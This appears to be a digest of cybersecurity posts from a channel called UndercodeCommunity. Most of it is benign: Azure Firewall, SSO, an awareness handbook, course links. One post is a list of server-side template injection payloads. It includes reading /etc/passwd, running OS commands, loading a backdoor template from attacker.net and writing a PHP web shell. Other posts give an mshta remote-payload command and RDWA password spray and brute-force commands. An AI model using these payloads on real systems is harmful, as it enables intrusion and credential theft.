🦑🟥🟥Azure Firewall 🟥🟥

🚀 Azure Firewall is a stateful, cloud-native network security service designed to secure your Azure workloads and ensure compliance in today’s threat-laden digital landscape.

🔑 Key Features You Need to Know:
1️⃣ Application and Network Rule Filtering
• Define rules based on FQDNs, ports, and protocols to control inbound and outbound traffic.
• Layer 7 filtering for advanced application-level protection.

2️⃣ Threat Intelligence-Based Filtering
• Leverage Microsoft Threat Intelligence to block malicious IPs and domains automatically.
• Get real-time threat updates for proactive defense.

3️⃣ Built-in High Availability
• No need for load balancers—Azure Firewall is built for redundancy and 99.95% SLA.

4️⃣ Dynamic Scalability
• Scales automatically to handle high traffic volumes, ensuring uninterrupted security.

5️⃣ Centralized Policy Management
• Manage security policies across multiple Azure Firewalls using Azure Firewall Manager.

6️⃣ Logging and Analytics
• Monitor traffic patterns with deep logging and analytics in Azure Monitor and Sentinel.

7️⃣ Hybrid and Multi-Cloud Support
• Secure traffic between on-premises, Azure, and other cloud providers using ExpressRoute and VPN Gateway.

💡 Advanced Scenarios with Azure Firewall:
✔ Network Address Translation (NAT): Protect public-facing services with DNAT/SNAT rules.
✔ Integration with Private Link: Secure connections to Azure PaaS services.
✔ Zero Trust Network Security: Enforce strict segmentation and access controls.

📈 Why Choose Azure Firewall?
🔒 Enterprise-grade security with TLS inspection and IDPS (Intrusion Detection & Prevention System).
🌍 Globally distributed for large-scale enterprise needs.
⚡ Effortless integration with Azure Security Center, Azure Virtual WAN, and Third-party SIEM tools.

Ref: Mahesh Girhe
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Master Cybersecurity Awareness: Protect Yourself in the Digital World!

In the ever-evolving digital landscape, cyber threats are becoming increasingly sophisticated. Whether you’re an individual user or a professional, understanding cybersecurity is crucial to protecting your data, privacy, and assets.

📖 The Cybersecurity Awareness Handbook is your one-stop guide to safeguarding your online presence. Here’s what it covers:

🔐 Key Insights in the Handbook

1️⃣ Understanding Cyber Threats
• Learn about phishing, ransomware, malware, and social engineering attacks.
• Understand how attackers exploit vulnerabilities in systems and human behavior.

2️⃣ Building Strong Cyber Defenses
• Create robust passwords and implement multi-factor authentication (MFA).
• Discover the importance of regular software updates and patch management.

3️⃣ Safe Online Practices
• Tips for secure online shopping and social media usage.
• Identifying fake websites and avoiding harmful downloads.

4️⃣ Incident Response Plans
• Step-by-step guidance on responding to data breaches or system compromises.
• Learn about reporting cybercrimes and recovering from attacks.

5️⃣ Empowering Your Workplace
• Tips for creating a cybersecurity culture in professional environments.
• How employees can become the first line of defense against cyber threats.

💡 Why You Need This Handbook
• Stay Ahead of Threats: Cybersecurity is evolving daily; this guide keeps you informed.
• Actionable Tips: Practical steps to implement immediately for better security.
• Comprehensive Knowledge: From basic concepts to advanced strategies, it’s all here.

🛡 Ready to strengthen your cybersecurity skills?
Download the Cybersecurity Awareness Handbook now and take charge of your online safety.

Ref: Mahesh Girhe
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

How Hackers Exploit RDP Proxies in Sophisticated MiTM Attacks

🦑 Secure Code Review Challenge 16:

The goal of this challenge is to pop a shell 🐚 and then provide concrete code-level remediation guidance on how to fix the vulnerability.

You can run the challenge on your machine by cloning the GitHub repo > GET <, navigating into './challenge-16', and running 'docker-compose up'.

Ref: Florian WalterFlorian Walter
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Account Takeover Techniques: Critical Vulnerabilities Mindmap" ?

Account takeover (ATO) is a critical vulnerability that can compromise sensitive user data and system integrity. This mindmap outlines various ATO techniques, including:

IDOR in Password Reset

Password Reset Poisoning

Mass Assignment

OAuth Misconfigurations

Improper Rate-Limit Checks etc...........

Ref: AMIT KUMAR
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE courses to boost your skills! 📈

1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h

Ref: Mohamed Hamdi
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New SSTI (Server Side Template Injection) - Payloads

Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}

PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}

Ref: Aman Dara
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 LOLbins attacks :

mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.

During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.

The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.

Note : These logs revealed suspicious PowerShell commands executing obfuscated scripts.

Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.

Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:

1>Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2>Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.

Sample Code : mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"

hashtag#incidentresponse hashtag#dfir hashtag#soc hashtag#cybersecurity hashtag#mitre hashtag#attack hashtag#windows

Ref: Soumick kar
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

𝐒𝐀𝐌𝐀 𝐂𝐲𝐛𝐞𝐫𝐬𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐀𝐮𝐝𝐢𝐭 𝐂𝐡𝐞𝐜𝐤𝐥𝐢𝐬𝐭

🦑SSO (Single Sign-On) Explained.

SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.

In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamlines user experience.

To fully understand the SSO process, 𝗹𝗲𝘁’𝘀 𝘁𝗮𝗸𝗲 𝗮 𝗹𝗼𝗼𝗸 𝗮𝘁 𝗵𝗼𝘄 𝗮 𝘂𝘀𝗲𝗿 𝘄𝗼𝘂𝗹𝗱 𝗹𝗼𝗴 𝗶𝗻𝘁𝗼 𝗟𝗶𝗻𝗸𝗲𝗱𝗜𝗻 𝘂𝘀𝗶𝗻𝗴 𝗚𝗼𝗼𝗴𝗹𝗲 𝗮𝘀 𝘁𝗵𝗲 𝗶𝗱𝗲𝗻𝘁𝗶𝘁𝘆 𝗽𝗿𝗼𝘃𝗶𝗱𝗲𝗿:

𝟭) 𝗨𝘀𝗲𝗿 𝗿𝗲𝗾𝘂𝗲𝘀𝘁𝘀 𝗮𝗰𝗰𝗲𝘀𝘀

First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".

𝟮) 𝗔𝘂𝘁𝗵𝗲𝗻𝘁𝗶𝗰𝗮𝘁𝗶𝗼𝗻 𝗿𝗲𝗾𝘂𝗲𝘀𝘁

From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.

𝟯) 𝗜𝗱𝗣 𝗰𝗵𝗲𝗰𝗸𝘀 𝗳𝗼𝗿 𝗮𝗰𝘁𝗶𝘃𝗲 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.

𝟰) 𝗨𝘀𝗲𝗿 𝘀𝘂𝗯𝗺𝗶𝘁𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).

𝟱) 𝗜𝗱𝗣 𝘃𝗲𝗿𝗶𝗳𝗶𝗲𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.

𝟲) 𝗜𝗱𝗣 𝘀𝗲𝗻𝗱𝘀 𝘁𝗼𝗸𝗲𝗻 𝘁𝗼 𝗦𝗲𝗿𝘃𝗶𝗰𝗲 𝗣𝗿𝗼𝘃𝗶𝗱𝗲𝗿

Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provier (LinkedIn).

𝟳) 𝗔𝗰𝗰𝗲𝘀𝘀 𝗴𝗿𝗮𝗻𝘁𝗲𝗱 𝘂𝘀𝗶𝗻𝗴 𝗲𝘅𝗶𝘀𝘁𝗶𝗻𝗴 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Since the Identity Provider has established a session, when the user goes to access a different Service Provider (eg; GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.

SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.

💭 What's your favourite way to go about authentication? 💬

Ref: Nikki SiapnoNikki Siapno
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Extracting information remotely from Microsoft Remote Desktop Web Access (RDWA) with RDWAtool

🔍 Microsoft Remote Desktop Web Access (RDWA) applications are often overlooked yet can be a treasure trove of information for attackers. RDWAtool is a Python-based all-in-one tool designed to analyze and test RDWA instances for vulnerabilities while extracting valuable insights.
🛠 What can RDWAtool do?

1️⃣ Extract useful Information in black box remotely:
- FQDN of the remote server to map the environment.
- Internal AD domain name derived from the FQDN.
- Remote Windows Server version for targeted exploitation.

In spray mode:

rdwatool spray -tu https://rds.podalirius.net/RDWeb/Pages/en-US/login.aspx

In brute mode:

rdwatool brute -tu https://rds.podalirius.net/RDWeb/Pages/en-US/login.aspx

> Free <
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑💰 Cost Savings: SSE vs. SASE Simplified!

🌐 Organizations leveraging Palo Alto Networks experience significant ROI through unified management and simplified operations—all within a single pane of glass.
Streamline your security strategy while accelerating growth!
What’s the Difference?

🟠 SSE (Security Service Edge):
Focuses on securing access to apps and data for remote and on-premises users.
Core features: SWG, CASB, and ZTNA for seamless, secure connectivity.

🟠 SASE (Secure Access Service Edge):
Combines networking (SD-WAN) and security services in a single cloud-delivered solution.

Perfect for securing distributed users and sites with optimal performance.
Why Choose Palo Alto Networks?

✔️ Unified platform for better visibility and control.
✔️ Simplified operations with scalable solutions for all use cases.
✔️ Future-ready security with proven innovation.

Let’s make security smarter, faster, and simpler—together!

Ref: Dhari A.Dhari A.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁